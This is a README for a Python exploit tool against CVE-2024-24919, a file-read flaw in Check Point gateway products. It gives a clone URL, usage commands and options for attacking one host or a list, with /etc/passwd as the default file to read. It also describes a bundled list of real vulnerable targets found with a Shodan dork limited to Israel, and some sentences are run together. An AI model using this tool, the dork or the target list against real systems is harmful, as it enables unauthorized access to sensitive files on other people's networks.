This Python script is an exploit for CVE-2024-24919, a CVE that hitted Check Point Products: (CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, Quantum Spark Appliances) Versions: (R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20), allowing unauthorized access to sensitive files on a target system. It targets a vulnerability in the /clients/MyCRL endpoint
git clone https://github.com/MohamedWagdy7/CVE-2024-24919is a file contains number of targets running vulnerable version, these targets enumerated from shodan using this dork "Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7" 200 country:"IL"
python exploit.py -d <target> [-f <file>] [-proxy <proxy>] [-o <output>]
python exploit.py -l <list> [-f <file>] [-proxy <proxy>] [-o <output>]python exploit.py -l ./targets.txt -proxy 127.0.0.1:8080 -o CVE-2024-24919.txt- -d, --target: Specifies a single target to be tested.
- -l, --list: Specifies a list of targets to be tested.
- -f, --file: Specifies a file to exploit (default: /etc/passwd).
- -proxy, --proxy: Specifies a proxy to use for requests.
- -o, --output: Specifies a filename to save the output (default: output.txt).